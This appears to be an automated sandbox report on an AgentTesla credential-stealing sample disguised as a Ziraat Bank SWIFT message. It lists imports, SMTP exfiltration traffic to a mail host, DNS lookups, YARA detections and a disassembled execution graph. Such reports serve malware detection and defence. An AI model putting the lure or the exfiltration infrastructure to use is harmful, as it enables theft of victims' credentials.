                                .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x2c1900x2e8dataEnglishUnited States
                                RT_DIALOG0x2c4780x100dataEnglishUnited States
                                RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                RT_DIALOG0x2c6980x60dataEnglishUnited States
                                RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                Imports

                                DLLImport
                                KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 14, 2022 12:14:21.816436052 CET49729587192.168.2.777.88.21.37
                                Jan 14, 2022 12:14:24.821912050 CET49729587192.168.2.777.88.21.37
                                Jan 14, 2022 12:14:30.642966986 CET49735587192.168.2.777.88.21.37
                                Jan 14, 2022 12:14:30.963020086 CET49729587192.168.2.777.88.21.37
                                Jan 14, 2022 12:14:33.651163101 CET49735587192.168.2.777.88.21.37
                                Jan 14, 2022 12:14:39.666896105 CET49735587192.168.2.777.88.21.37
                                Jan 14, 2022 12:14:43.134583950 CET49729587192.168.2.777.88.21.37
                                Jan 14, 2022 12:14:46.136400938 CET49729587192.168.2.777.88.21.37
                                Jan 14, 2022 12:14:51.743208885 CET49735587192.168.2.777.88.21.37
                                Jan 14, 2022 12:14:52.152290106 CET49729587192.168.2.777.88.21.37
                                Jan 14, 2022 12:14:54.730667114 CET49735587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:00.731127024 CET49735587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:04.383513927 CET49788587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:07.388025999 CET49788587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:12.998759031 CET49812587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:13.404131889 CET49788587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:16.169889927 CET49812587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:22.170479059 CET49812587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:25.740854979 CET49788587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:28.749264002 CET49788587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:34.229104042 CET49812587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:34.765422106 CET49788587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:37.234250069 CET49812587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:43.235353947 CET49812587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:46.831315994 CET49815587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:49.844641924 CET49815587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:55.240976095 CET49817587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:55.857549906 CET49815587192.168.2.777.88.21.37
                                Jan 14, 2022 12:15:58.242610931 CET49817587192.168.2.777.88.21.37

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 14, 2022 12:14:21.615456104 CET5976253192.168.2.78.8.8.8
                                Jan 14, 2022 12:14:21.774374962 CET53597628.8.8.8192.168.2.7
                                Jan 14, 2022 12:14:30.377652884 CET5945153192.168.2.78.8.8.8
                                Jan 14, 2022 12:14:30.638633013 CET53594518.8.8.8192.168.2.7
                                Jan 14, 2022 12:14:43.011908054 CET5931053192.168.2.78.8.8.8
                                Jan 14, 2022 12:14:43.133341074 CET53593108.8.8.8192.168.2.7
                                Jan 14, 2022 12:14:51.723941088 CET6429653192.168.2.78.8.8.8
                                Jan 14, 2022 12:14:51.741537094 CET53642968.8.8.8192.168.2.7
                                Jan 14, 2022 12:15:04.228090048 CET5882053192.168.2.78.8.8.8
                                Jan 14, 2022 12:15:04.381839037 CET53588208.8.8.8192.168.2.7
                                Jan 14, 2022 12:15:12.769236088 CET4924753192.168.2.78.8.8.8
                                Jan 14, 2022 12:15:12.997183084 CET53492478.8.8.8192.168.2.7
                                Jan 14, 2022 12:15:25.449325085 CET5606453192.168.2.78.8.8.8
                                Jan 14, 2022 12:15:25.739602089 CET53560648.8.8.8192.168.2.7
                                Jan 14, 2022 12:15:34.207704067 CET6145753192.168.2.78.8.8.8
                                Jan 14, 2022 12:15:34.226948977 CET53614578.8.8.8192.168.2.7
                                Jan 14, 2022 12:15:46.811651945 CET5836753192.168.2.78.8.8.8
                                Jan 14, 2022 12:15:46.829662085 CET53583678.8.8.8192.168.2.7

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Jan 14, 2022 12:14:21.615456104 CET192.168.2.78.8.8.80x490eStandard query (0)mail.antimikrop.com.trA (IP address)IN (0x0001)
                                Jan 14, 2022 12:14:30.377652884 CET192.168.2.78.8.8.80x1e5Standard query (0)mail.antimikrop.com.trA (IP address)IN (0x0001)
                                Jan 14, 2022 12:14:43.011908054 CET192.168.2.78.8.8.80xb33bStandard query (0)mail.antimikrop.com.trA (IP address)IN (0x0001)
                                Jan 14, 2022 12:14:51.723941088 CET192.168.2.78.8.8.80xa1d3Standard query (0)mail.antimikrop.com.trA (IP address)IN (0x0001)
                                Jan 14, 2022 12:15:04.228090048 CET192.168.2.78.8.8.80x115cStandard query (0)mail.antimikrop.com.trA (IP address)IN (0x0001)
                                Jan 14, 2022 12:15:12.769236088 CET192.168.2.78.8.8.80xac0cStandard query (0)mail.antimikrop.com.trA (IP address)IN (0x0001)
                                Jan 14, 2022 12:15:25.449325085 CET192.168.2.78.8.8.80x9d67Standard query (0)mail.antimikrop.com.trA (IP address)IN (0x0001)
                                Jan 14, 2022 12:15:34.207704067 CET192.168.2.78.8.8.80xf45aStandard query (0)mail.antimikrop.com.trA (IP address)IN (0x0001)
                                Jan 14, 2022 12:15:46.811651945 CET192.168.2.78.8.8.80x8a6bStandard query (0)mail.antimikrop.com.trA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Jan 14, 2022 12:14:21.774374962 CET8.8.8.8192.168.2.70x490eNo error (0)mail.antimikrop.com.trdomain.mail.yandex.netCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:14:21.774374962 CET8.8.8.8192.168.2.70x490eNo error (0)domain.mail.yandex.netmail.yandex.ruCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:14:21.774374962 CET8.8.8.8192.168.2.70x490eNo error (0)mail.yandex.ru77.88.21.37A (IP address)IN (0x0001)
                                Jan 14, 2022 12:14:30.638633013 CET8.8.8.8192.168.2.70x1e5No error (0)mail.antimikrop.com.trdomain.mail.yandex.netCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:14:30.638633013 CET8.8.8.8192.168.2.70x1e5No error (0)domain.mail.yandex.netmail.yandex.ruCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:14:30.638633013 CET8.8.8.8192.168.2.70x1e5No error (0)mail.yandex.ru77.88.21.37A (IP address)IN (0x0001)
                                Jan 14, 2022 12:14:43.133341074 CET8.8.8.8192.168.2.70xb33bNo error (0)mail.antimikrop.com.trdomain.mail.yandex.netCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:14:43.133341074 CET8.8.8.8192.168.2.70xb33bNo error (0)domain.mail.yandex.netmail.yandex.ruCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:14:43.133341074 CET8.8.8.8192.168.2.70xb33bNo error (0)mail.yandex.ru77.88.21.37A (IP address)IN (0x0001)
                                Jan 14, 2022 12:14:51.741537094 CET8.8.8.8192.168.2.70xa1d3No error (0)mail.antimikrop.com.trdomain.mail.yandex.netCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:14:51.741537094 CET8.8.8.8192.168.2.70xa1d3No error (0)domain.mail.yandex.netmail.yandex.ruCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:14:51.741537094 CET8.8.8.8192.168.2.70xa1d3No error (0)mail.yandex.ru77.88.21.37A (IP address)IN (0x0001)
                                Jan 14, 2022 12:15:04.381839037 CET8.8.8.8192.168.2.70x115cNo error (0)mail.antimikrop.com.trdomain.mail.yandex.netCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:15:04.381839037 CET8.8.8.8192.168.2.70x115cNo error (0)domain.mail.yandex.netmail.yandex.ruCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:15:04.381839037 CET8.8.8.8192.168.2.70x115cNo error (0)mail.yandex.ru77.88.21.37A (IP address)IN (0x0001)
                                Jan 14, 2022 12:15:12.997183084 CET8.8.8.8192.168.2.70xac0cNo error (0)mail.antimikrop.com.trdomain.mail.yandex.netCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:15:12.997183084 CET8.8.8.8192.168.2.70xac0cNo error (0)domain.mail.yandex.netmail.yandex.ruCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:15:12.997183084 CET8.8.8.8192.168.2.70xac0cNo error (0)mail.yandex.ru77.88.21.37A (IP address)IN (0x0001)
                                Jan 14, 2022 12:15:25.739602089 CET8.8.8.8192.168.2.70x9d67No error (0)mail.antimikrop.com.trdomain.mail.yandex.netCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:15:25.739602089 CET8.8.8.8192.168.2.70x9d67No error (0)domain.mail.yandex.netmail.yandex.ruCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:15:25.739602089 CET8.8.8.8192.168.2.70x9d67No error (0)mail.yandex.ru77.88.21.37A (IP address)IN (0x0001)
                                Jan 14, 2022 12:15:34.226948977 CET8.8.8.8192.168.2.70xf45aNo error (0)mail.antimikrop.com.trdomain.mail.yandex.netCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:15:34.226948977 CET8.8.8.8192.168.2.70xf45aNo error (0)domain.mail.yandex.netmail.yandex.ruCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:15:34.226948977 CET8.8.8.8192.168.2.70xf45aNo error (0)mail.yandex.ru77.88.21.37A (IP address)IN (0x0001)
                                Jan 14, 2022 12:15:46.829662085 CET8.8.8.8192.168.2.70x8a6bNo error (0)mail.antimikrop.com.trdomain.mail.yandex.netCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:15:46.829662085 CET8.8.8.8192.168.2.70x8a6bNo error (0)domain.mail.yandex.netmail.yandex.ruCNAME (Canonical name)IN (0x0001)
                                Jan 14, 2022 12:15:46.829662085 CET8.8.8.8192.168.2.70x8a6bNo error (0)mail.yandex.ru77.88.21.37A (IP address)IN (0x0001)

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Start time:12:13:43
                                Start date:14/01/2022
                                Path:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                                Imagebase:0x400000
                                File size:270191 bytes
                                MD5 hash:161523651320083122D05DD374C87EC4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.294724890.0000000003090000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.294724890.0000000003090000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:12:13:45
                                Start date:14/01/2022
                                Path:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                                Imagebase:0x400000
                                File size:270191 bytes
                                MD5 hash:161523651320083122D05DD374C87EC4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.554087278.00000000037F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.554087278.00000000037F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.551571985.0000000000508000.00000004.00000020.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.551571985.0000000000508000.00000004.00000020.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.292334595.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.292334595.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.554248422.0000000004930000.00000004.00020000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.554248422.0000000004930000.00000004.00020000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000001.292756258.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000001.292756258.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.291447047.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.291447047.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.554299855.0000000004972000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.554299855.0000000004972000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:12%
                                  Dynamic/Decrypted Code Coverage:6.2%
                                  Signature Coverage:22.4%
                                  Total number of Nodes:1328
                                  Total number of Limit Nodes:25

                                  Graph

                                  execution_graph 3905 401cc1 GetDlgItem GetClientRect 3906 4029e8 18 API calls 3905->3906 3907 401cf1 LoadImageA SendMessageA 3906->3907 3908 40287d 3907->3908 3909 401d0f DeleteObject 3907->3909 3909->3908 3910 401dc1 3911 4029e8 18 API calls 3910->3911 3912 401dc7 3911->3912 3913 4029e8 18 API calls 3912->3913 3914 401dd0 3913->3914 3915 4029e8 18 API calls 3914->3915 3916 401dd9 3915->3916 3917 4029e8 18 API calls 3916->3917 3918 401de2 3917->3918 3919 401423 25 API calls 3918->3919 3920 401de9 ShellExecuteA 3919->3920 3921 401e16 3920->3921 3922 401ec5 3923 4029e8 18 API calls 3922->3923 3924 401ecc GetFileVersionInfoSizeA 3923->3924 3925 401f45 3924->3925 3926 401eef GlobalAlloc 3924->3926 3926->3925 3927 401f03 GetFileVersionInfoA 3926->3927 3927->3925 3928 401f14 VerQueryValueA 3927->3928 3928->3925 3929 401f2d 3928->3929 3933 4059e3 wsprintfA 3929->3933 3931 401f39 3934 4059e3 wsprintfA 3931->3934 3933->3931 3934->3925 3935 4014ca 3936 404e23 25 API calls 3935->3936 3937 4014d1 3936->3937 3938 403f4b lstrcpynA lstrlenA 3939 40604c 3941 405ed0 3939->3941 3940 40683b 3941->3940 3942 405f51 GlobalFree 3941->3942 3943 405f5a GlobalAlloc 3941->3943 3944 405fd1 GlobalAlloc 3941->3944 3945 405fc8 GlobalFree 3941->3945 3942->3943 3943->3940 3943->3941 3944->3940 3944->3941 3945->3944 3341 401f51 3342 401f63 3341->3342 3343 402004 3341->3343 3362 4029e8 3342->3362 3346 401423 25 API calls 3343->3346 3352 40215b 3346->3352 3347 4029e8 18 API calls 3348 401f73 3347->3348 3349 401f88 LoadLibraryExA 3348->3349 3350 401f7b GetModuleHandleA 3348->3350 3349->3343 3351 401f98 GetProcAddress 3349->3351 3350->3349 3350->3351 3353 401fe5 3351->3353 3354 401fa8 3351->3354 3377 404e23 3353->3377 3356 401fb0 3354->3356 3357 401fc7 3354->3357 3374 401423 3356->3374 3368 72c510a0 3357->3368 3359 401ff8 FreeLibrary 3359->3352 3360 401fb8 3360->3352 3360->3359 3363 4029f4 3362->3363 3388 405aa7 3363->3388 3366 401f6a 3366->3347 3428 72c51000 3368->3428 3373 72c5117b 3373->3360 3375 404e23 25 API calls 3374->3375 3376 401431 3375->3376 3376->3360 3378 404e3e 3377->3378 3387 404ee1 3377->3387 3379 404e5b lstrlenA 3378->3379 3380 405aa7 18 API calls 3378->3380 3381 404e84 3379->3381 3382 404e69 lstrlenA 3379->3382 3380->3379 3384 404e97 3381->3384 3385 404e8a SetWindowTextA 3381->3385 3383 404e7b lstrcatA 3382->3383 3382->3387 3383->3381 3386 404e9d SendMessageA SendMessageA SendMessageA 3384->3386 3384->3387 3385->3384 3386->3387 3387->3360 3393 405ab4 3388->3393 3389 405cca 3390 402a15 3389->3390 3423 405a85 lstrcpynA 3389->3423 3390->3366 3407 405ce3 3390->3407 3392 405b48 GetVersion 3401 405b55 3392->3401 3393->3389 3393->3392 3394 405ca1 lstrlenA 3393->3394 3397 405aa7 10 API calls 3393->3397 3402 405ce3 5 API calls 3393->3402 3421 4059e3 wsprintfA 3393->3421 3422 405a85 lstrcpynA 3393->3422 3394->3393 3397->3394 3399 405bc0 GetSystemDirectoryA 3399->3401 3400 405bd3 GetWindowsDirectoryA 3400->3401 3401->3393 3401->3399 3401->3400 3403 405c07 SHGetSpecialFolderLocation 3401->3403 3404 405aa7 10 API calls 3401->3404 3405 405c4a lstrcatA 3401->3405 3416 40596c RegOpenKeyExA 3401->3416 3402->3393 3403->3401 3406 405c1f SHGetPathFromIDListA CoTaskMemFree 3403->3406 3404->3401 3405->3393 3406->3401 3413 405cef 3407->3413 3408 405d57 3409 405d5b CharPrevA 3408->3409 3411 405d76 3408->3411 3409->3408 3410 405d4c CharNextA 3410->3408 3410->3413 3411->3366 3413->3408 3413->3410 3414 405d3a CharNextA 3413->3414 3415 405d47 CharNextA 3413->3415 3424 4055a3 3413->3424 3414->3413 3415->3410 3417 4059dd 3416->3417 3418 40599f RegQueryValueExA 3416->3418 3417->3401 3419 4059c0 RegCloseKey 3418->3419 3419->3417 3421->3393 3422->3393 3423->3390 3425 4055a9 3424->3425 3426 4055bc 3425->3426 3427 4055af CharNextA 3425->3427 3426->3413 3427->3425 3429 72c5100c GetTempPathW 3428->3429 3430 72c51030 3429->3430 3431 72c51045 VirtualProtect CreateFileW ReadFile 3430->3431 3431->3373 3953 4014d6 3958 4029cb 3953->3958 3955 4014dc Sleep 3957 40287d 3955->3957 3959 405aa7 18 API calls 3958->3959 3960 4029df 3959->3960 3960->3955 3966 402858 SendMessageA 3967 402872 InvalidateRect 3966->3967 3968 40287d 3966->3968 3967->3968 3969 4018d8 3970 40190f 3969->3970 3971 4029e8 18 API calls 3970->3971 3972 401914 3971->3972 3973 4053aa 68 API calls 3972->3973 3974 40191d 3973->3974 3975 402259 3976 4029e8 18 API calls 3975->3976 3977 402267 3976->3977 3978 4029e8 18 API calls 3977->3978 3979 402270 3978->3979 3980 4029e8 18 API calls 3979->3980 3981 40227a GetPrivateProfileStringA 3980->3981 3982 40155b 3983 401577 ShowWindow 3982->3983 3984 40157e 3982->3984 3983->3984 3985 40158c ShowWindow 3984->3985 3986 40287d 3984->3986 3985->3986 3987 4018db 3988 4029e8 18 API calls 3987->3988 3989 4018e2 3988->3989 3990 405346 MessageBoxIndirectA 3989->3990 3991 4018eb 3990->3991 3992 404f61 3993 404f82 GetDlgItem GetDlgItem GetDlgItem 3992->3993 3994 40510d 3992->3994 4038 403e6c SendMessageA 3993->4038 3996 405116 GetDlgItem CreateThread CloseHandle 3994->3996 3997 40513e 3994->3997 3996->3997 3999 405169 3997->3999 4000 405155 ShowWindow ShowWindow 3997->4000 4001 40518b 3997->4001 3998 404ff3 4003 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 3998->4003 4002 4051c7 3999->4002 4005 4051a0 ShowWindow 3999->4005 4006 40517a 3999->4006 4043 403e6c SendMessageA 4000->4043 4047 403e9e 4001->4047 4002->4001 4012 4051d2 SendMessageA 4002->4012 4010 405069 4003->4010 4011 40504d SendMessageA SendMessageA 4003->4011 4008 4051c0 4005->4008 4009 4051b2 4005->4009 4044 403e10 4006->4044 4015 403e10 SendMessageA 4008->4015 4014 404e23 25 API calls 4009->4014 4016 40507c 4010->4016 4017 40506e SendMessageA 4010->4017 4011->4010 4018 4051eb CreatePopupMenu 4012->4018 4019 405199 4012->4019 4014->4008 4015->4002 4039 403e37 4016->4039 4017->4016 4020 405aa7 18 API calls 4018->4020 4022 4051fb AppendMenuA 4020->4022 4024 405221 4022->4024 4025 40520e GetWindowRect 4022->4025 4023 40508c 4026 405095 ShowWindow 4023->4026 4027 4050c9 GetDlgItem SendMessageA 4023->4027 4029 40522a TrackPopupMenu 4024->4029 4025->4029 4030 4050b8 4026->4030 4031 4050ab ShowWindow 4026->4031 4027->4019 4028 4050f0 SendMessageA SendMessageA 4027->4028 4028->4019 4029->4019 4032 405248 4029->4032 4042 403e6c SendMessageA 4030->4042 4031->4030 4034 405264 SendMessageA 4032->4034 4034->4034 4035 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4034->4035 4036 4052a3 SendMessageA 4035->4036 4036->4036 4037 4052c4 GlobalUnlock SetClipboardData CloseClipboard 4036->4037 4037->4019 4038->3998 4040 405aa7 18 API calls 4039->4040 4041 403e42 SetDlgItemTextA 4040->4041 4041->4023 4042->4027 4043->3999 4045 403e17 4044->4045 4046 403e1d SendMessageA 4044->4046 4045->4046 4046->4001 4048 403eb6 GetWindowLongA 4047->4048 4058 403f3f 4047->4058 4049 403ec7 4048->4049 4048->4058 4050 403ed6 GetSysColor 4049->4050 4051 403ed9 4049->4051 4050->4051 4052 403ee9 SetBkMode 4051->4052 4053 403edf SetTextColor 4051->4053 4054 403f01 GetSysColor 4052->4054 4055 403f07 4052->4055 4053->4052 4054->4055 4056 403f0e SetBkColor 4055->4056 4057 403f18 4055->4057 4056->4057 4057->4058 4059 403f32 CreateBrushIndirect 4057->4059 4060 403f2b DeleteObject 4057->4060 4058->4019 4059->4058 4060->4059 4061 403964 4062 403ab7 4061->4062 4063 40397c 4061->4063 4065 403ac8 GetDlgItem GetDlgItem 4062->4065 4081 403b08 4062->4081 4063->4062 4064 403988 4063->4064 4066 403993 SetWindowPos 4064->4066 4067 4039a6 4064->4067 4068 403e37 19 API calls 4065->4068 4066->4067 4070 4039c3 4067->4070 4071 4039ab ShowWindow 4067->4071 4072 403af2 SetClassLongA 4068->4072 4069 403e83 SendMessageA 4100 403b74 4069->4100 4076 4039e5 4070->4076 4077 4039cb DestroyWindow 4070->4077 4071->4070 4078 40140b 2 API calls 4072->4078 4073 403b62 4073->4069 4075 403ab2 4073->4075 4074 401389 2 API calls 4079 403b3a 4074->4079 4082 4039ea SetWindowLongA 4076->4082 4083 4039fb 4076->4083 4080 403dc0 4077->4080 4078->4081 4079->4073 4084 403b3e SendMessageA 4079->4084 4080->4075 4092 403df1 ShowWindow 4080->4092 4081->4073 4081->4074 4082->4075 4087 403a72 4083->4087 4088 403a07 GetDlgItem 4083->4088 4084->4075 4085 40140b 2 API calls 4085->4100 4086 403dc2 DestroyWindow EndDialog 4086->4080 4091 403e9e 8 API calls 4087->4091 4089 403a37 4088->4089 4090 403a1a SendMessageA IsWindowEnabled 4088->4090 4094 403a44 4089->4094 4095 403a8b SendMessageA 4089->4095 4096 403a57 4089->4096 4104 403a3c 4089->4104 4090->4075 4090->4089 4091->4075 4092->4075 4093 405aa7 18 API calls 4093->4100 4094->4095 4094->4104 4095->4087 4098 403a74 4096->4098 4099 403a5f 4096->4099 4097 403e10 SendMessageA 4097->4087 4101 40140b 2 API calls 4098->4101 4103 40140b 2 API calls 4099->4103 4100->4075 4100->4085 4100->4086 4100->4093 4102 403e37 19 API calls 4100->4102 4105 403e37 19 API calls 4100->4105 4120 403d02 DestroyWindow 4100->4120 4101->4104 4102->4100 4103->4104 4104->4087 4104->4097 4106 403bef GetDlgItem 4105->4106 4107 403c04 4106->4107 4108 403c0c ShowWindow EnableWindow 4106->4108 4107->4108 4129 403e59 EnableWindow 4108->4129 4110 403c36 EnableWindow 4113 403c4a 4110->4113 4111 403c4f GetSystemMenu EnableMenuItem SendMessageA 4112 403c7f SendMessageA 4111->4112 4111->4113 4112->4113 4113->4111 4130 403e6c SendMessageA 4113->4130 4131 405a85 lstrcpynA 4113->4131 4116 403cad lstrlenA 4117 405aa7 18 API calls 4116->4117 4118 403cbe SetWindowTextA 4117->4118 4119 401389 2 API calls 